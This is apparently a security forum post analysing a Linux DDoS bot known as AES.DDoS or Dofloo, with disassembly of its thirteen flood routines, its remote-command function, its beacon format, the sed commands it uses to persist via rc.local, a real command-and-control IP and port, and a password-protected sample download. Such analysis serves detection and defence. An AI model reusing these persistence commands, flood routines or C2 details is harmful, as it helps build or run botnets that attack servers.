Jump to content
Aerosol

Linux/AES.DDoS (alias Dofloo)

Recommended Posts

Posted

The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one.

This sample was served in the panel below, noted: just being released sample:

001.png

Some notes:

Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474)

Accept-Language: zh-cn
Accept-Language: zh-CN

Autostart installation:

sed -i -e '/%s/d' /etc/rc.local                                 
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local

Source files (unstripped)

File : 'crtstuff.c'
File : 'AES.cpp'
File : 'main.cpp'
File : 'eh_personality.cc'
File : 'eh_alloc.cc'
File : 'eh_exception.cc'
File : 'eh_call.cc'
File : 'pure.cc'
File : 'eh_globals.cc'
File : 'del_op.cc'
File : 'eh_catch.cc'
File : 'class_type_info.cc'
File : 'allocator-inst.cc'
File : 'string-inst.cc'
File : 'eh_terminate.cc'
File : 'eh_term_handler.cc'
File : 'si_class_type_info.cc'
File : 'eh_throw.cc'
File : 'eh_unex_handler.cc'
File : 'vterminate.cc'
File : 'tinfo.cc'
File : 'new_op.cc'
File : 'eh_type.cc'
File : 'cp-demangle.c'
File : 'functexcept.cc'
File : 'regex.cc'
File : 'system_error.cc'
File : 'functional.cc'
File : 'future.cc'
File : 'new_handler.cc'
File : 'bad_typeid.cc'
File : 'bad_alloc.cc'
File : 'eh_ptr.cc'
File : 'guard.cc'
File : 'guard_error.cc'
File : 'bad_cast.cc'
File : 'ios_failure.cc'
File : 'stdexcept.cc'
File : 'condition_variable.cc'
File : 'mutex.cc'
File : 'thread.cc'
File : 'unwind-dw2.c'
File : 'unwind-dw2-fde-dip.c'
File : 'libgcc2.c'
File : 'unwind-c.c'

Some PoC of AES:

.text:0804832C ; AES::AES(unsigned char *)
.text:0804832C public _ZN3AESC2EPh
;;
.text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4])
.text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h
;;

DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood

;; DDOS 1

0x0804EE62:
mov eax, [ebp+arg_0]
mov eax, [eax+18Ch]
cmp eax, 28h
jg short 0x0804EE9D
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
jmp short 0x0804EEC8

;; DDOS 2

0x0804EE9D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create

;; DDOS 3

0x0804EEED:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 4

0x0804EF3D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 5

0x0804EF8D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 6

0x0804EFDD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 7

0x0804F02D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 8

0x0804F07D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 9

0x0804F0CD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 10

0x0804F11D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 11

0x0804F16D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 12

0x0804F1BD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

;; DDOS 13

0x0804F20A:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1

System command interface for execution.. this is bad...hacked server can be used as RAT

.text:0x0804E6C2 ; Cmdshell(_MSGHEAD *)
.text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD
.text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near
.text:0x0804E6C2
.text:0x0804E6C2 arg_0= dword ptr 8
.text:0x0804E6C2
.text:0x0804E6C2 push ebp
.text:0x0804E6C3 mov ebp, esp
.text:0x0804E6C5 sub esp, 18h
.text:0x0804E6C8 mov eax, [ebp+arg_0]
.text:0x0804E6CB add eax, 100h
.text:0x0804E6D0 mov [esp], eax
.text:0x0804E6D3 call system
.text:0x0804E6D8 leave
.text:0x0804E6D9 retn
.text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp
.text:0x0804E6D9

We can expect CPU info with below format will be sent to remote:

      :`
.text:0x080509E2 lea eax, [ebp+var_1110]
.text:0x080509E8 add eax, 68h
.text:0x080509EB mov [esp+4], eax
.text:0x080509EF lea eax, [ebp+var_1110]
.text:0x080509F5 add eax, 64h
.text:0x080509F8 mov [esp], eax
.text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *)
.text:0x08050A00 lea eax, [ebp+var_11D0]
.text:0x08050A06 mov [esp], eax
.text:0x08050A09 call sysinfo
.text:0x08050A0E mov [ebp+var_24], eax
.text:0x08050A11 mov eax, [ebp+var_11C0]
.text:0x08050A17 shr eax, 14h
.text:0x08050A1A mov [ebp+var_10A4], eax
.text:0x08050A20 mov edx, [ebp+var_11C0]
.text:0x08050A26 mov eax, [ebp+var_11BC]
.text:0x08050A2C mov ecx, edx
.text:0x08050A2E sub ecx, eax
.text:0x08050A30 mov eax, ecx
.text:0x08050A32 shr eax, 14h
.text:0x08050A35 mov [ebp+var_10A0], eax
.text:0x08050A3B lea ebx, [ebp+var_43C]
.text:0x08050A41 mov eax, 0
.text:0x08050A46 mov edx, 100h
.text:0x08050A4B mov edi, ebx
.text:0x08050A4D mov ecx, edx
.text:0x08050A4F rep stosd
.text:0x08050A51 mov ebx, [ebp+var_10A0]
.text:0x08050A57 mov ecx, [ebp+var_10A4]
.text:0x08050A5D mov edx, [ebp+var_10A8]
.text:0x08050A63 mov eax, [ebp+var_10AC]
.text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker"
.text:0x08050A71 mov [esp+1Ch], ebx
.text:0x08050A75 mov [esp+18h], ecx
.text:0x08050A79 mov [esp+14h], edx
.text:0x08050A7D mov [esp+10h], eax
.text:0x08050A81 lea eax, [ebp+var_1110]
.text:0x08050A87 mov [esp+0Ch], eax
.text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"...
.text:0x08050A93 mov dword ptr [esp+4], 400h
.text:0x08050A9B lea eax, [ebp+var_43C]
.text:0x08050AA1 mov [esp], eax
.text:0x08050AA4 call snprintf
.text:0x08050AA9 mov eax, ds:MainSocket
.text:0x08050AAE test eax, eax

CNC:

sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215")
Loc:
119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK

DOWNLOAD

Pass: infected

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...